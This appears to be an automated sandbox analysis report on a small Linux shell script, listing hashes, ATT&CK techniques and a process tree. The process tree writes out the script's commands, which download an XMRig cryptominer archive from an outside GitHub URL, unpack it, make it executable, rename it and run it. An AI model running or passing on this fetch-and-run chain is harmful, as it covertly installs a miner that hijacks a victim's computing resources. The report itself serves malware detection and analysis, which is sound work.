a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

Analysis

max time kernel
89s
max time network
91s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
30-10-2024 07:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

runnb.sh
Size

213B
MD5

a1189543e2f98f6696c6d857b899ab0a
SHA1

30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512

472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score

7^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmod

pid process

778 chmod
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

716 sudo
Reads CPU attributes 1 TTPs 2 IoCs
discovery

System Information Discovery
T1082

Processes:

exim4exim4

description ioc process

File opened for reading /sys/devices/system/cpu/online exim4
File opened for reading /sys/devices/system/cpu/online exim4

pid	process
778	chmod

pid	process
716	sudo

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

tarmvsudosendmailsendmaildpkgdpkgaptaptdpkgdpkg

description	ioc	process
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/self/fd	sudo
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

Processes:

aptapt

description	ioc	process
File opened for modification	/tmp/fileutl.message.WzI2V4	apt
File opened for modification	/tmp/fileutl.message.AvkAud	apt
File opened for modification	/tmp/fileutl.message.ilkOfp	apt
File opened for modification	/tmp/fileutl.message.zVpOt6	apt
File opened for modification	/tmp/fileutl.message.9nRvSD	apt
File opened for modification	/tmp/fileutl.message.9dqMwE	apt
File opened for modification	/tmp/fileutl.message.WcR0vO	apt
File opened for modification	/tmp/fileutl.message.zlCY61	apt

/tmp/runnb.sh
/tmp/runnb.sh
1⤵
PID:712

/usr/bin/sudo
sudo apt install wget
2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:716

/usr/sbin/sendmail
sendmail -t
3⤵
- Reads runtime system information
PID:730

/usr/sbin/exim4
/usr/sbin/exim4 -Mc 1t621U-0000Bm-28
4⤵
- Reads CPU attributes
PID:749

/usr/sbin/sendmail
sendmail -t
3⤵
- Reads runtime system information
PID:736

/usr/sbin/exim4
/usr/sbin/exim4 -Mc 1t621U-0000Bs-1a
4⤵
- Reads CPU attributes
PID:750

/usr/bin/apt
apt install wget
3⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
4⤵
- Reads runtime system information
PID:747

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
4⤵
- Reads runtime system information
PID:757

/usr/bin/apt
apt install wget
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:774

/usr/bin/dpkg
/usr/bin/dpkg --print-foreign-architectures
3⤵
- Reads runtime system information
PID:775

/usr/bin/wget
wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
2⤵
PID:776

/bin/tar
tar xvf xmrigtar.tar.gz
2⤵
- Reads runtime system information
PID:777

/bin/chmod
chmod +x xmrig
2⤵
- File and Directory Permissions Modification
PID:778

/bin/mv
mv xmrig cool
2⤵
- Reads runtime system information
PID:779

/tmp/cool
./cool
2⤵
PID:780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/mail/user

Filesize
847B

MD5
640851a099b0924ef87da1bde9213496

SHA1
2975f67cdc149899512db1511f9d17100045a19b

SHA256
5ce4beac9c7cdcddcb506f6d778e44f2d275efe164b6ffe5f46541814d5f6765

SHA512
07af2336ef143c0c003f9cfd5c5a46e8a530b9509bd3936c0b746e50f610b6703c41f098fd0b6e3cc0fcfe04606bbc0ffd26bf4ff770bf276dcd908c2c29fe11

Download Submit
/var/mail/user

Filesize
1KB

MD5
7d1b7c9ec117e464c967b04e40dc917c

SHA1
b5fdabb35301008b9e5f064f63957d991b20a2a1

SHA256
fd0289931cd48ceef8402218759a0ef3c3b92709339888c9ef61b4e8d2212455

SHA512
1e674622fcc30cfbbd3b54d65ad704f3210c68967f739f2cb9855c5203d5c40ad578d268aeab635ce7d31ab8a7dbb6bc89f045cc382cef93f028fa3304d43f11

Download Submit
/var/spool/exim4/input/1t621U-0000Bm-28-D

Filesize
130B

MD5
465045cd95f22ff11eb088e6815deb8c

SHA1
7c8bb7e84a9f75589605de5d7986dccade5bf361

SHA256
b6971bba03378659f9406c0b79e1490c6e3db71f6078ec1ea0d2a95753970ea0

SHA512
99cab2982d170a4e0c53b1883b0e4535da6595c50c96c2b1896ca5957e08fd53b2319949ee099e397ab738e9921ffa353a91c9bdfb447e29c37b8cb9aaced0db

Download Submit
/var/spool/exim4/input/1t621U-0000Bs-1a-D

Filesize
147B

MD5
a24ea3361fe25750d01505bd9959709d

SHA1
5a59e407bd3d152365eff370a13ca22fcc8f1440

SHA256
9b6509e68a6b9ef350873add87a33e226084b934414643d8c42e51f7b1876367

SHA512
20f7a1236a64d5294df79084e0dae4c619af1e378856d23b3a9dec0b4d4466e25177e06c526b4b9abef3e69e35a2356ed032829dd819f76dc9d7d24d28fa58e6

Download Submit
/var/spool/exim4/input/1t621U-0000Bs-1a-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/hdr.730

Filesize
918B

MD5
139cdc49bf9445206aa7ee6ea933e643

SHA1
68cac77e2ac401ea4ec8e94a2bb786fe2a8102ba

SHA256
839095038742ae5c454474d404af33f913d88f2704a45105b866c5eeafc69caa

SHA512
a924692c692996c0daebd55180d1c32cbb42a269edccb4ab25553940359a4a7efb83a7dda91f7a7c34eeb37d8d3a8b5a6e477f852df39cd31cdfcf29a83334e2

Download Submit
/var/spool/exim4/msglog/1t621U-0000Bm-28

Filesize
288B

MD5
5efc9207cd0527b0e4de128fc8cfee1d

SHA1
3dbb00c8481c7f534def163034bdf99d215d9d92

SHA256
b758199e01d98ab56e6ededdf8426c397a6cbc6c13f457cc2bac7cc972f35254

SHA512
4112913ab55bb61154498e838f6801ef70fc04329824eeb2cfbfe58ebc77c0cfd9b4ef337858eb3407a19fbc9f3df4c2fa065d1cd0686110cce0a6380b0cede0

Download Submit
/var/spool/exim4/msglog/1t621U-0000Bm-28

Filesize
89B

MD5
c49660faad3e44556c0822f5f1da6041

SHA1
7c33df99bf8e73818ce7440766b8793f4e8930e3

SHA256
62bbe5d199844a74b0f060342c2bf6d363dadca074be8d27c68a3b26c8b9aef5

SHA512
1e0cbb02fa67f484747ea3f862321c1ed3a8a001221f5d31c93d8b7d3db104ea7d32b277fa11fb41da0e86fb1a0b071f0e88ae86e5138da4b82e612c5eab0099

Download Submit
/var/spool/exim4/msglog/1t621U-0000Bs-1a

Filesize
288B

MD5
083d7af4c669fd3df2c1e56c41aa4baa

SHA1
34ab5b10a8528613ff3403861ee052ca414877e3

SHA256
d2526655c3f95d8926db262c8c0cc9057dfbf4b775680bbc769f622e2fa75d14

SHA512
ee23993d96a57edf5fb34aec0b4d5e12a973fff5e77da910e59e7fe32e8d37641143df360597ec10a9eb35cdeabf183408d35879b44b359006d8fca9412aefec

Download Submit
/var/spool/exim4/msglog/1t621U-0000Bs-1a

Filesize
89B

MD5
9b2ae3e5e6d128b4320e9b74f1f2ce5b

SHA1
7304e9685912fb0a66192800ffa6e26ac18810ee

SHA256
7d3ebb122cd5547a82cad74881bc2ac151574ca432a4a9a1b5951d72d6d78327

SHA512
389a7056ad381e8bccaf4df7a3d224c14bcda22afd79b85f9f023e638c5a5d3f742dc35ccdcfc5fd9a05ba6339a7657b90d5f9bea348deb72fd100d9a06d53b0

Download Submit